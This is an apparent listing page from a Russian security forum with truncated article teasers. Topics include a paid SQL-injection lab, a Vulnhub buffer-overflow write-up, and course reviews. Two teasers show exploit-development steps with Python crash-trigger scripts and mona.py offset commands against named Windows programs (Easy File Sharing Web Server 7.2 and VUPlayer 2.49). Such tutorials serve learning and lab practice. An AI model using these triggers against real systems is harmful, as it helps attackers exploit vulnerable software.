Форум информационной безопасности - Codeby.net

SQLIM лаборатория 90 дней - старт 3 января

  • 4 476
  • 0
Доступ к лаборатории курса SQLIM и лицензирование

Стоимость доступа к лаборатории на 90 дней 6000 рублей

Записаться

Со второго потока курса, мы решили открыть платный доступ к лаборатории курса «SQL-injection Master». Это позволит сэкономить средства, а также оценить свой уровень подготовки.
  • Лаборатория состоит из 68 заданий разной сложности, и 10 заданий экзамена.
  • Все сдавшие экзамен, вне зависимости от того была ли это покупка полного курса, или только доступа к лаборатории, получают бонусную методичку и сертификат.
Для кого такой подход может быть интересен:
  • Если вы уже имеете серьёзный опыт раскрутки SQLi, и хотите получить незабываемое приключение при прохождении тасков.
  • Если вы считаете, что имеете большой опыт раскрутки SQLi, хотите проверить свои навыки, и сделать вывод - стоит ли записаться на полный курс.
  • Если вы прошли уже курс «SQL-injection Master», но не смогли прорешать все задания.
  • Если вы прошли курс...

Writeup Writeup School: 1 Vulnhub - Моё первое переполнение буфера

  • 17 009
  • 14
Приветствую!

В одном из прошлых врайтапов я описал прохождение коробки альтернативным способом, вместо использования ошибки переполнения буфера и сказал, что пошел развиваться в направление The buffer overflow...

И вот, наконец, в данном прохождении, я представлю свои первые успехи в деле "о переполнении буфера". Ну, к делу...

Исходные данные:
Атакуемая машина под управлением Debian linux, на которой есть 2 флага.
Основная машина (с которой проводится атака) под управлением ОС Kali Linux и ВМ с windows 7
Задача: получить 2 флага с целевой машины и права пользователя root.

Выяснив ip адрес атакуемой машины, при помощи команды
kali@kali:~/Lab$ sudo netdiscover

сканируем её nmap'ом:
kali@kali:~/Lab$ nmap -A -p- -v 192.168.3.125

1640519647689.png


Как видно -на целевой машине крутится 3 сервиса: 22 порт - ssh, 80 порт - http и 23 порт с телнетом.

При попытке подключения к 23 порту, видно...

Статья Easy File Sharing Web Server 7.2 SEH overflow

  • 3 151
  • 0
Тестирование проводилось на Windows XP SP3 x86 En (no dep)

Уязвимое ПО: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

Запускаем ПО

1640554135976.png


И аттачимся отладчиком Immunity Debugger к процессу, дальше передаем программе входной поток. Посмотрим как оно себя поведет.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import pack
import socket
payload = "A"*5000

exploit = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exploit.connect(("127.0.0.1",80))
exploit.send("GET " + payload + " HTTP/1.1\r\n")
exploit.close()

1640554171427.png


посмотрим Chain SEH

1640554187682.png


Сгенерирум строку паттерн используя плагин mona.py

!mona pc 50000

1640554203618.png


Скопируем сгенерированную строку ASCII строку в наш триггер сплойт. Перезапустим сервер, приаттачимся, и запустим сплойт.

После чего пишем в строке команд отладчика

!mona findmsp

Чтобы выполнить циклический поиск по патернам, сгенерированной нами ASCII строки. Mona будет...

WAPT от лица студента

  • 3 815
  • 1
Привет, Codeby! Хочу немного рассказать о своем опыте прохождения курса.

Я сам студент скромного беларусского вуза, учусь на схемотехника и немного играю в CTF. До попадания на курс имелся небольшой опыт пентеста, в основном полученный на HTB и аналогичных площадках. На курс WAPT я попал после The Standoff, когда Codeby заметили нашу команду Bulba Hackers на 5 месте и помогли получить курс бедным студентам =)

К курсу в самом начале я относился не очень серьезно, даже не открывал методички и не смотрел видео, думая, что там не будет для меня новой информации, но потом я все же нашел для себя много нового, об этом расскажу дальше.

Пассив

После получения впн конфига я сразу же пошел смотреть таски. Первые несколько задач решались довольно быстро, кроме задачи с нахождением реального IP, в этом таске я мучительно пытался сабмитать IP и локацию серверов CDN от CF и даже одного сервера, который светился в Censys, но все они не подходили, все же в один момент мой флаг приняли и я перешел к следующим таскам. Из этого раздела еще запомнился последний таск с пойском сайта игры. Многие стонали от него, но этот таск мне запомнится на долго, хоть он и сдался за...

Статья Как бесплатно арендовать VPS у AMAZON, а также его первичная настройка.

  • 14 741
  • 9
Я старался сделать это пошаговое руководство как можно более подробным. В данном руководстве мы за 3 этапа развернем свой собственный VPS, в облачной инфраструктуре Amazon Web Services (AWS), с помощью бесплатного аккаунта (на 12 месяцев), на инстансе (виртуальной машине) под управлением Debian 10.

Этапы

  1. Регистрация бесплатного аккаунта AWS
  2. Создание инстанса AWS
  3. Подключение к инстансу AWS

1. Регистрация аккаунта AWS

Для регистрации бесплатного аккаунта AWS требуется реальный номер телефона и платежеспособная кредитная карта Visa или Mastercard. Для проверки валидности карты, при регистрации списывается 1$ который в дальнейшем возвращается.

1.1. Открытие консоли управления AWS

Переходим по адресу Amazon EC2 и жмём на кнопку "Создание аккаунта AWS"

1640269164945.png

1.2. Заполнение...

Статья Новостной дайджест по ИБ/IT за 20.12-27.12

  • 3 347
  • 1
Здравия всем, дамы и господа, речь сегодня вновь пойдёт пойдёт о прошлом. О том что произошло и во что это, возможно, выльется. Приглашаю вас к прочтению и приятного времяпрепровождения.

IbIt.jpg


Если вы это видите, значит меня уже нет

Очень частый приём из медиа-культуры, однако не так давно он стал реальностью. Как выяснилось, господин Сачков ещё год назад записал видео на случай своего убийства или ареста. Он переслал ролик своим близким и друзьям. В нем Сачков рассказывает, что за ним следят, и он опасается того, что неизвестные лица его убьют. Также Сачков предполагал, что правоохранительные органы могут его обвинить в госизмене и арестовать. А его, как мы помним, арестовали именно по подозрению в госизмене. Сейчас эта информация просто существует в вакууме и, насколько мне известно, развития не получила.
Основатель Group-IB Илья Сачков записал видео на случай своего ареста или смерти

А в...

Статья VUPlayer 2.49 .wax vanilla EIP overflow

  • 2 733
  • 0
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.

Создадим эксплойт триггер чтобы перезаписать регистр EIP.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A"*5000

file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"

Запускаем Vuplayer под отладчиком

1640552858368.png


и скармливаем наш файловый сплойт.

1640552874728.png


Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py

!mona pc 5000

1640552891943.png


Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…

1640552907739.png


Как мы видим выполнение программы остановилось. Смотрим на значение регистра EIP, зачем копируем это значение 68423768 для вычисления смещения.

Пишем в панели команд

!mona po 68423768

1640552927331.png
...

Карманный бот для анализа веб-сайта в Телеграме

  • 9 901
  • 1
Введение:

в.png


Думаю многие сталкивались с проблемой, когда нужно было сделать базовый анализ какого либо вебсайта, но ПК/Ноутбук рядом не находились, но был смартфон.

В таких случаях есть несколько решений, например кто-то имеет SSH доступ к основной машине, кто-то VNC. Конечно, это даст вам весь функционал (почти) и должно решить проблему, но когда в руках смартфон, то только мазохисты будут возражать заявлению о том, что печатать и управлять курсором с телефона совсем неудобно.

Главной проблемой остается управление, нужно что-то удобное, почему бы нам не взять телеграм ботов? Они ограничены в функционале, но гораздо более удобные, в них есть список комманд на которые достаточно нажать, а не печатать полностью, да и сам интерфейс более юзер-френдли.

В качестве библиотеки для бота я возьму telebot, т.к считаю ее самой простой и функциональной.

Мы реализуем поддержку:
  • Censys
  • Самописного сканера портов
  • Детектора WAF
  • SearchSploit
План:
1. Подготовка почвы.
2. Создание модулей и подключение модулей.
2.1 Censys
2.2 Scaner
2.3 WAF
2.4 SearchSploit
3...

КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ)

  • 10 631
  • 19
ПРИВЕТСТВУЮ, ФОРУМЧАНЕ!!

111111.jpg

Решил присесть за перо, чтобы поделиться своим опытом обучения на курсах WAPT от Cobeby. Я не первый и надеюсь не последний, но я сразу поставил себе задачу написать честный и объективный отзыв без приукрас и приуменьшений. Сразу скажу, я не являюсь членом команды Codeby и не ставлю целью разрекламировать курс для привлечения людей, я просто хочу поделиться своими мыслями - как позитивными, так и негативными.

Сегодня 22 декабря 2021 года, я учусь с 8 декабря и начал писать отзыв сейчас, чтобы просто не забыть все аспекты. В процессе написания, я не буду ничего менять, как бы не изменилось мое отношение ко всему происходящему. Хочу сразу предупредить, что в ходе моего повествования не будет никакого раскрытия решений заданий - в этой среде это не приветствуется. Насколько я помню, даже мэтры, которые пишут гайды по прохождению задач с различных площадок CTF никогда полностью не раскрывают всех мелочей. Без подобной философии не будет прогресса в образовании.

И так, поехали.

ПРЕДЫСТОРИЯ.

Всю свою жизнь я...​

Статья Обход 2FA и методы захвата аккаунта: исследование уязвимостей

  • 9 721
  • 11
2fa (1).jpg

Дисклеймер

Вся представленная информация размещена исключительно в образовательных и исследовательских целях. Автор не рекомендует использовать полученные знания для взлома, нанесения вреда или ущерба. Будьте благоразумны и не нарушайте законы.

Резюме

Различные приложения уже давно слились с нашей повседневностью. В них наши персональные,банковские,личные и другие данные, и их утечка может обойтись очень дорого.

В этой статье я затрону насколько плохим может быть отношение к безопасности на примере довольно крупной компании в СНГ по доставке азиатской пищи. Пытаюсь зарепортить уязвимости. Описываю доказательство концепции. Надеюсь, статья будет интересна для вас.


Введение

Двухфакторная авторизация была придумана для дополнительной безопасности, и помимо стандартного ввода логина и пароля предполагает так же и ввод дополнительного элемента: код из...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Статистика форума

Темы
51 035
Сообщения
344 825
Пользователи
148 579
Новый пользователь
LucasApk